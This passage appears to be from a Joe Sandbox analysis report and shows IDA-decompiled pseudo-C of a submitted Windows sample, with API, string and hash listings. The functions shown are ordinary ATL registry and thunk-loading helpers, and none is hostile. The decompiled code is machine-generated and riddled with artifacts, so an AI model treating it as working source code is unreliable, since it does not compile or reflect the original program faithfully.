                      					if(__eflags == 0) {
                      						goto L11;
                      					}
                      					_t49 = _v16(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_v8, 0);
                      					__eflags = _t73 - _t73;
                      					_t35 = E009D1520(_t49, __eflags);
                      				} else {
                      					_t35 = 1;
                      				}
                      			}














                      APIs
                      • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00943232
                      • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedA), ref: 00943289
                      • RegCreateKeyExA.ADVAPI32(CCCCCCCC,CCCCCCCC,?,?,?,?,?,?,?), ref: 0094330A
                      Strings
                      • %ls, xrefs: 0094324D
                      • RegCreateKeyTransactedA, xrefs: 00943280
                      • hAdvAPI32 != 0, xrefs: 00943248
                      • Advapi32.dll, xrefs: 0094322D
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atltransactionmanager.h, xrefs: 00943259
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: AddressCreateHandleModuleProc
                      • String ID: %ls$Advapi32.dll$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atltransactionmanager.h$RegCreateKeyTransactedA$hAdvAPI32 != 0
                      • API String ID: 1964897782-1911401746
                      • Opcode ID: f1acd41f2e832151ea490d534bd55f3669b9ba8c414acdc181acd5771b99ecda
                      • Instruction ID: 673cbd52992ab302eecaae4a99b51b8ce3538a095a2ebe8897de052a6a3a80ad
                      • Opcode Fuzzy Hash: f1acd41f2e832151ea490d534bd55f3669b9ba8c414acdc181acd5771b99ecda
                      • Instruction Fuzzy Hash: 51311972A04108BFCB14DF9DD885FDE77B9AB88744F10C249F919A7254D674DE80CBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 83%
                      			E009430F0(intOrPtr __ecx, void* __esi, void* _a4, char* _a8, int _a12, int _a16, void** _a20) {
                      				intOrPtr* _v8;
                      				struct HINSTANCE__* _v12;
                      				struct HINSTANCE__* _v16;
                      				void* _t27;
                      				long _t31;
                      				_Unknown_base(*)()* _t34;
                      				void* _t39;
                      				void* _t40;
                      				void* _t56;
                      				void* _t57;
                      
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				if( *_v8 == 0) {
                      					__eflags =  *((intOrPtr*)(_v8 + 4));
                      					if(__eflags == 0) {
                      						L11:
                      						_t27 = 1;
                      						L12:
                      						return E009D1520(_t27, _t56 - _t57 + 0xc);
                      					}
                      					_t31 = RegOpenKeyExA(_a4, _a8, _a12, _a16, _a20);
                      					__eflags = _t57 - _t57;
                      					_t27 = E009D1520(_t31, __eflags);
                      					goto L12;
                      				}
                      				_v12 = E009D1520(GetModuleHandleA("Advapi32.dll"), _t57 - _t57);
                      				_t61 = _v12;
                      				if(_v12 == 0) {
                      					_t40 = L00994930(_t61, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atltransactionmanager.h", 0x255, 0, "%ls", L"hAdvAPI32 != 0");
                      					_t57 = _t57 + 0x18;
                      					if(_t40 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_v12 != 0) {
                      					_t34 = GetProcAddress(_v12, "RegOpenKeyTransactedA");
                      					__eflags = _t57 - _t57;
                      					_v16 = E009D1520(_t34, _t57 - _t57);
                      					__eflags = _v16;
                      					if(__eflags == 0) {
                      						goto L11;
                      					}
                      					_t39 = _v16(_a4, _a8, _a12, _a16, _a20,  *_v8, 0);
                      					__eflags = _t57 - _t57;
                      					_t27 = E009D1520(_t39, __eflags);
                      				} else {
                      					_t27 = 1;
                      				}
                      			}

                      APIs
                      • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00943122
                      • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedA), ref: 00943179
                      • RegOpenKeyExA.ADVAPI32(CCCCCCCC,CCCCCCCC,?,?,?), ref: 009431DA
                      Strings
                      • %ls, xrefs: 0094313D
                      • hAdvAPI32 != 0, xrefs: 00943138
                      • Advapi32.dll, xrefs: 0094311D
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atltransactionmanager.h, xrefs: 00943149
                      • RegOpenKeyTransactedA, xrefs: 00943170
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: AddressHandleModuleOpenProc
                      • String ID: %ls$Advapi32.dll$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atltransactionmanager.h$RegOpenKeyTransactedA$hAdvAPI32 != 0
                      • API String ID: 1337834000-1483138269
                      • Opcode ID: 8f517c41e0eb7e242b46a4525a15e4911667a1400f2c5cda06b21680b2eb3828
                      • Instruction ID: 3d3f4892edf181d06399effcb695b8225bba3a0a82631db35a9a28311ccc6e2c
                      • Opcode Fuzzy Hash: 8f517c41e0eb7e242b46a4525a15e4911667a1400f2c5cda06b21680b2eb3828
                      • Instruction Fuzzy Hash: 03313C72E44208BFCB10EF99D886F9E77B9AB88740F10C149F505A7291D2799E80CBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 66%
                      			E00944310(void** __ecx, void* __esi, char* _a4) {
                      				void** _v8;
                      				struct HINSTANCE__* _v12;
                      				long _t23;
                      				void* _t24;
                      				void* _t27;
                      				struct HINSTANCE__* _t28;
                      				_Unknown_base(*)()* _t31;
                      				void* _t34;
                      				void* _t48;
                      				void* _t53;
                      				void* _t54;
                      
                      				_t48 = __esi;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				do {
                      					_t56 =  *_v8;
                      					if( *_v8 == 0) {
                      						_t34 = L00994930(_t56, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x167c, 0, "%ls", L"m_hKey != 0");
                      						_t54 = _t54 + 0x18;
                      						if(_t34 == 1) {
                      							asm("int3");
                      						}
                      					}
                      				} while (0 != 0);
                      				if(_v8[2] == 0) {
                      					__eflags =  *0xb33698 & 0x000000ff;
                      					if(( *0xb33698 & 0x000000ff) == 0) {
                      						_t28 = GetModuleHandleA("Advapi32.dll");
                      						__eflags = _t54 - _t54;
                      						_v12 = E009D1520(_t28, _t54 - _t54);
                      						__eflags = _v12;
                      						if(_v12 != 0) {
                      							_t31 = GetProcAddress(_v12, "RegDeleteKeyExA");
                      							__eflags = _t54 - _t54;
                      							 *0xb315dc = E009D1520(_t31, _t54 - _t54);
                      						}
                      						 *0xb33698 = 1;
                      					}
                      					__eflags =  *0xb315dc;
                      					if( *0xb315dc == 0) {
                      						_t23 = RegDeleteKeyA( *_v8, _a4);
                      						__eflags = _t54 - _t54;
                      						_t24 = E009D1520(_t23, __eflags);
                      					} else {
                      						_t27 =  *0xb315dc( *_v8, _a4, _v8[1], 0);
                      						__eflags = _t54 - _t54;
                      						_t24 = E009D1520(_t27, __eflags);
                      					}
                      				} else {
                      					_t24 = E00943330(_v8[2], _t48,  *_v8, _a4);
                      				}
                      				return E009D1520(_t24, _t53 - _t54 + 8);
                      			}

                      APIs
                      • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 0094438F
                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExA), ref: 009443B0
                      • RegDeleteKeyA.ADVAPI32(00000000,CCCCCCCC), ref: 00944402
                      Strings
                      • %ls, xrefs: 00944335
                      • m_hKey != 0, xrefs: 00944330
                      • Advapi32.dll, xrefs: 0094438A
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00944341
                      • RegDeleteKeyExA, xrefs: 009443A7
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: AddressDeleteHandleModuleProc
                      • String ID: %ls$Advapi32.dll$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$RegDeleteKeyExA$m_hKey != 0
                      • API String ID: 588496660-3303359461
                      • Opcode ID: 145105d481913b5e348bccaf80a177221812079bdaaf2264cacc805c112de11c
                      • Instruction ID: 80c78d06ec10bc7a0f3fa8982e4008b63ab65786d381c24d636d555d3ef09235
                      • Opcode Fuzzy Hash: 145105d481913b5e348bccaf80a177221812079bdaaf2264cacc805c112de11c
                      • Instruction Fuzzy Hash: D131F536E40208FFC710EF98D986FAE77B9AB84744F248159F5059B391DB749E80CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 83%
                      			E00943330(intOrPtr __ecx, void* __esi, void* _a4, char* _a8) {
                      				intOrPtr* _v8;
                      				struct HINSTANCE__* _v12;
                      				struct HINSTANCE__* _v16;
                      				void* _t21;
                      				long _t24;
                      				_Unknown_base(*)()* _t27;
                      				void* _t31;
                      				void* _t32;
                      				void* _t44;
                      				void* _t45;
                      
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				if( *_v8 == 0) {
                      					__eflags =  *((intOrPtr*)(_v8 + 4));
                      					if(__eflags == 0) {
                      						L11:
                      						_t21 = 1;
                      						L12:
                      						return E009D1520(_t21, _t44 - _t45 + 0xc);
                      					}
                      					_t24 = RegDeleteKeyA(_a4, _a8);
                      					__eflags = _t45 - _t45;
                      					_t21 = E009D1520(_t24, __eflags);
                      					goto L12;
                      				}
                      				_v12 = E009D1520(GetModuleHandleA("Advapi32.dll"), _t45 - _t45);
                      				_t49 = _v12;
                      				if(_v12 == 0) {
                      					_t32 = L00994930(_t49, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atltransactionmanager.h", 0x29c, 0, "%ls", L"hAdvAPI32 != 0");
                      					_t45 = _t45 + 0x18;
                      					if(_t32 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_v12 != 0) {
                      					_t27 = GetProcAddress(_v12, "RegDeleteKeyTransactedA");
                      					__eflags = _t45 - _t45;
                      					_v16 = E009D1520(_t27, _t45 - _t45);
                      					__eflags = _v16;
                      					if(__eflags == 0) {
                      						goto L11;
                      					}
                      					_t31 = _v16(_a4, _a8, 0, 0,  *_v8, 0);
                      					__eflags = _t45 - _t45;
                      					_t21 = E009D1520(_t31, __eflags);
                      				} else {
                      					_t21 = 1;
                      				}
                      			}

                      APIs
                      • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00943362
                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedA), ref: 009433B6
                      • RegDeleteKeyA.ADVAPI32(CCCCCCCC,CCCCCCCC), ref: 00943403
                      Strings
                      • %ls, xrefs: 0094337D
                      • hAdvAPI32 != 0, xrefs: 00943378
                      • RegDeleteKeyTransactedA, xrefs: 009433AD
                      • Advapi32.dll, xrefs: 0094335D
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atltransactionmanager.h, xrefs: 00943389
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: AddressDeleteHandleModuleProc
                      • String ID: %ls$Advapi32.dll$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atltransactionmanager.h$RegDeleteKeyTransactedA$hAdvAPI32 != 0
                      • API String ID: 588496660-2197841288
                      • Opcode ID: 2bcc338614b894c94d292df82b3e0f6d3a3967a6bea3867f9cad0e2dae7ecfee
                      • Instruction ID: 5a6d863b733b150c08b1396e9a4f624214829dd3154404030ecc64d6c8aff5b3
                      • Opcode Fuzzy Hash: 2bcc338614b894c94d292df82b3e0f6d3a3967a6bea3867f9cad0e2dae7ecfee
                      • Instruction Fuzzy Hash: 30218E32E44208FBCB10EBA9D84AF9EBB74AB84704F50C195F5056B291D7B99E80CBD1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 54%
                      			E009566BA(void* __ecx, intOrPtr* _a4) {
                      				void* _v8;
                      				struct HINSTANCE__* _t4;
                      				intOrPtr* _t5;
                      				intOrPtr* _t11;
                      
                      				if( *0xb3021c == 0) {
                      					_t4 = LoadLibraryExA("atlthunk.dll", 0, 0x800);
                      					_t15 = _t4;
                      					if(_t4 == 0 || E0095697D(_t15, "AtlThunk_AllocateData", 0xb3020c) == 0 || E0095697D(_t15, "AtlThunk_InitData", 0xb30210) == 0 || E0095697D(_t15, "AtlThunk_DataToCode", 0xb30214) == 0 || E0095697D(_t15, "AtlThunk_FreeData", 0xb30218) == 0) {
                      						_t5 = 0;
                      					} else {
                      						asm("lock or [eax], ecx");
                      						_t5 = _a4;
                      						 *0xb3021c = 1;
                      						__imp__DecodePointer( *_t5);
                      					}
                      					return _t5;
                      				} else {
                      					_t11 = _a4;
                      					__imp__DecodePointer( *_t11);
                      					return _t11;
                      				}
                      			}

                      APIs
                      • DecodePointer.KERNEL32(?,?,?,00956BEE,00B30214,?,?,?,?,00944D19), ref: 009566CC
                      • LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,?,?,00956BEE,00B30214,?,?,?,?,00944D19), ref: 009566E1
                      • DecodePointer.KERNEL32(?), ref: 0095675D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: DecodePointer$LibraryLoad
                      • String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
                      • API String ID: 1423960858-1745123996
                      • Opcode ID: 209fa837fc80c9a26350b82c50d15392487b7053151ffbf257140dd832f45261
                      • Instruction ID: 79cd4882effdb6de572ebf8188b0138b3059f2f16e09b44f9622a0b13f17fcae
                      • Opcode Fuzzy Hash: 209fa837fc80c9a26350b82c50d15392487b7053151ffbf257140dd832f45261
                      • Instruction Fuzzy Hash: 9D01C4306D53047BDA05FB12ED1BB8B3FA85F42B4AF544091BC01A72A3EAA1890ED791
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 54%
                      			E0095676A(void* __ecx, intOrPtr* _a4) {
                      				void* _v8;
                      				struct HINSTANCE__* _t4;
                      				intOrPtr* _t5;
                      				intOrPtr* _t11;
                      
                      				if( *0xb3021c == 0) {
                      					_t4 = LoadLibraryExA("atlthunk.dll", 0, 0x800);
                      					_t15 = _t4;
                      					if(_t4 == 0 || E0095697D(_t15, "AtlThunk_AllocateData", 0xb3020c) == 0 || E0095697D(_t15, "AtlThunk_InitData", 0xb30210) == 0 || E0095697D(_t15, "AtlThunk_DataToCode", 0xb30214) == 0 || E0095697D(_t15, "AtlThunk_FreeData", 0xb30218) == 0) {
                      						_t5 = 0;
                      					} else {
                      						asm("lock or [eax], ecx");
                      						_t5 = _a4;
                      						 *0xb3021c = 1;
                      						__imp__DecodePointer( *_t5);
                      					}
                      					return _t5;
                      				} else {
                      					_t11 = _a4;
                      					__imp__DecodePointer( *_t11);
                      					return _t11;
                      				}
                      			}

                      APIs
                      • DecodePointer.KERNEL32(?,?,?,00956B8C,00B3020C,?,?,00944CBB), ref: 0095677C
                      • LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,00000000,?,?,00956B8C,00B3020C,?,?,00944CBB), ref: 00956791
                      • DecodePointer.KERNEL32(?), ref: 0095680D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: DecodePointer$LibraryLoad
                      • String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
                      • API String ID: 1423960858-1745123996
                      • Opcode ID: 209fa837fc80c9a26350b82c50d15392487b7053151ffbf257140dd832f45261
                      • Instruction ID: 6135c025f616519ccf9b1b12e117faf1bfe79d9db48ea59a8bded32794f7034a
                      • Opcode Fuzzy Hash: 209fa837fc80c9a26350b82c50d15392487b7053151ffbf257140dd832f45261
                      • Instruction Fuzzy Hash: 9701C4706D53047BCA05EB12DC1BB8B3B984F42B4AF5480A1BD01672A3EAB1890EC792
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 54%
                      			E009568CA(void* __ecx, intOrPtr* _a4) {
                      				void* _v8;
                      				struct HINSTANCE__* _t4;
                      				intOrPtr* _t5;
                      				intOrPtr* _t11;
                      
                      				if( *0xb3021c == 0) {
                      					_t4 = LoadLibraryExA("atlthunk.dll", 0, 0x800);
                      					_t15 = _t4;
                      					if(_t4 == 0 || E0095697D(_t15, "AtlThunk_AllocateData", 0xb3020c) == 0 || E0095697D(_t15, "AtlThunk_InitData", 0xb30210) == 0 || E0095697D(_t15, "AtlThunk_DataToCode", 0xb30214) == 0 || E0095697D(_t15, "AtlThunk_FreeData", 0xb30218) == 0) {
                      						_t5 = 0;
                      					} else {
                      						asm("lock or [eax], ecx");
                      						_t5 = _a4;
                      						 *0xb3021c = 1;
                      						__imp__DecodePointer( *_t5);
                      					}
                      					return _t5;
                      				} else {
                      					_t11 = _a4;
                      					__imp__DecodePointer( *_t11);
                      					return _t11;
                      				}
                      			}

                      APIs
                      • DecodePointer.KERNEL32(?,CCCCCCCC,?,00956C96,00B30210,?,?,?,00944CDF,?,?,?), ref: 009568DC
                      • LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,CCCCCCCC,?,00956C96,00B30210,?,?,?,00944CDF,?,?,?), ref: 009568F1
                      • DecodePointer.KERNEL32(?), ref: 0095696D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: DecodePointer$LibraryLoad
                      • String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
                      • API String ID: 1423960858-1745123996
                      • Opcode ID: 209fa837fc80c9a26350b82c50d15392487b7053151ffbf257140dd832f45261
                      • Instruction ID: e20856c99aee56582abe752f4ee98b81de3a003c1ee66ff47d10d70810e69232
                      • Opcode Fuzzy Hash: 209fa837fc80c9a26350b82c50d15392487b7053151ffbf257140dd832f45261
                      • Instruction Fuzzy Hash: DF01AD316952047BCB05EB22DC2BB8B3BA85F4374AF544091BC45672A3EAB18A0EC7D5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 54%
                      			E0095681A(void* __ecx, intOrPtr* _a4) {
                      				void* _v8;
                      				struct HINSTANCE__* _t4;
                      				intOrPtr* _t5;
                      				intOrPtr* _t11;
                      
                      				if( *0xb3021c == 0) {
                      					_t4 = LoadLibraryExA("atlthunk.dll", 0, 0x800);
                      					_t15 = _t4;
                      					if(_t4 == 0 || E0095697D(_t15, "AtlThunk_AllocateData", 0xb3020c) == 0 || E0095697D(_t15, "AtlThunk_InitData", 0xb30210) == 0 || E0095697D(_t15, "AtlThunk_DataToCode", 0xb30214) == 0 || E0095697D(_t15, "AtlThunk_FreeData", 0xb30218) == 0) {
                      						_t5 = 0;
                      					} else {
                      						asm("lock or [eax], ecx");
                      						_t5 = _a4;
                      						 *0xb3021c = 1;
                      						__imp__DecodePointer( *_t5);
                      					}
                      					return _t5;
                      				} else {
                      					_t11 = _a4;
                      					__imp__DecodePointer( *_t11);
                      					return _t11;
                      				}
                      			}








                      APIs
                      • DecodePointer.KERNEL32(?,CCCCCCCC,?,00956C3D,00B30218,?,?,?,00954C21), ref: 0095682C
                      • LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,CCCCCCCC,?,00956C3D,00B30218,?,?,?,00954C21), ref: 00956841
                      • DecodePointer.KERNEL32(?), ref: 009568BD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: DecodePointer$LibraryLoad
                      • String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
                      • API String ID: 1423960858-1745123996
                      • Opcode ID: 209fa837fc80c9a26350b82c50d15392487b7053151ffbf257140dd832f45261
                      • Instruction ID: 202fbf65d67dcc5ece60fe48df2c51e7545695db18827d7e5b5ddcdad34dfcea
                      • Opcode Fuzzy Hash: 209fa837fc80c9a26350b82c50d15392487b7053151ffbf257140dd832f45261
                      • Instruction Fuzzy Hash: 9001C4306D5304BBDA05EB12DC1FB8B3BA84F4274AF5440A1FD016B2A3EAA1851EC792
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E009671F0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                      				intOrPtr _v8;
                      				char _v16;
                      				char _v24;
                      				intOrPtr _v28;
                      				char _v32;
                      				char _v40;
                      				signed int _t46;
                      				char* _t47;
                      				char* _t60;
                      				void* _t77;
                      				char* _t102;
                      				char* _t106;
                      				void* _t112;
                      				void* _t113;
                      
                      				_t113 = __esi;
                      				_t112 = __edi;
                      				_t77 = __ebx;
                      				_t46 = _a16;
                      				_v32 =  *((intOrPtr*)(0x9d8c88 + _t46 * 8));
                      				_v28 =  *((intOrPtr*)(0x9d8c8c + _t46 * 8));
                      				_t47 =  *0xb30640; // 0x0
                      				if( *_t47 == 0) {
                      					E0095F350( &_v16, 1);
                      					E0095FCA0( &_v16,  &_v32);
                      					if(E0096A560(_a8) == 0) {
                      						E0095FD40( &_v16, _a8);
                      					}
                      					if(E0096A560(_a12) == 0) {
                      						if(E0096A560(_a8) == 0) {
                      							E0095FDE0( &_v16, 0x20);
                      						}
                      						E0095FD40( &_v16, _a12);
                      					}
                      					E0095F240(_a4,  &_v16);
                      					return _a4;
                      				}
                      				_t106 =  *0xb30640; // 0x0
